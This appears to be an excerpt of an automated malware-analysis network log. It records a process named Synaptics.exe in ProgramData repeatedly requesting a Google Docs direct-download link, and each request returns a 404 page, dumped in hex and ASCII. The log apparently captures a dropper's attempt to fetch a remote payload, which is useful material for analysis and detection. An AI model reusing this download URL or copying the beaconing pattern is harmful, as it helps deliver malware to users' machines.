                                                                                                                                                                                        2022-05-17 11:31:34 UTC130INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        43192.168.2.349791142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:34 UTC127OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:34 UTC130INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:34 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7adeFdDPwj6EBsAKhL1+eQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:34 UTC131INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:34 UTC132INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 5a 47 51 71 65 52 43 41 73 57 6e 68 75 6a 5a 49 51 44 6e 77 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GZGQqeRCAsWnhujZIQDnwQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:34 UTC133INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:34 UTC133INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        44192.168.2.349792142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:34 UTC130OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:34 UTC133INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:34 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-RKcA8rGNCLWqxvNIqG+bYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:34 UTC135INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 4d 51 31 2f 65 6a 38 52 4a 50 76 51 4e 63 69 53 35 67 34 5a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jMQ1/ej8RJPvQNciS5g4ZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:34 UTC136INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:34 UTC136INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        45192.168.2.349793142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:34 UTC133OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:35 UTC136INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:35 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-gFr18jw+9Fq+up+enJ/PzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:35 UTC138INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:35 UTC138INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 56 54 59 42 4f 31 34 4f 44 65 33 67 77 35 73 69 58 6a 73 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yVTYBO14ODe3gw5siXjs4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:35 UTC139INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:35 UTC139INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        46192.168.2.349794142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:35 UTC139OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:35 UTC139INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:35 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-j9pc8txi31PJ5wqm3nLeeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:35 UTC141INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:35 UTC141INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 69 78 46 6f 78 45 77 47 30 62 59 6b 75 74 31 75 49 58 45 44 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mixFoxEwG0bYkut1uIXEDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:35 UTC142INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:35 UTC142INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        47192.168.2.349795142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:35 UTC139OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:35 UTC142INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:35 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-+91qGc8kty6JEAlBF3YB+Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:35 UTC144INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:35 UTC144INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 54 2b 6a 58 2f 5a 38 62 42 37 69 2b 62 50 47 67 37 79 4a 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lT+jX/Z8bB7i+bPGg7yJfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:35 UTC145INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:35 UTC145INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        48192.168.2.349796142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
